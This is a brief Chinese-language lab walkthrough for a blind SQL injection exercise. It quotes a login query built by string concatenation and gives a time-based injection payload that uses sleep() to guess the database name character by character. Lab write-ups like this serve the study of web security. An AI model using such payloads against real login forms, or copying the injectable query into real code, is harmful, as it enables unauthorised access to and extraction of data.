本关没有错误提示,那么我们只能靠猜测进行注入。这里我直接从源代码中看到了sql语句
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
那这里对id进行 'id' 的处理。
本关我们可以利用布尔注入和延时注入进行。
下面我们来演示一下延时注入。
猜测数据库名第一位:
uname=admin' and if(ascii(substr(database(),1,1))=115,sleep(5),1)#&passwd=11&submit=Submit
正确的时候延时5秒,不正确的时候直接登录。
其他的payload可参考less5自行构造。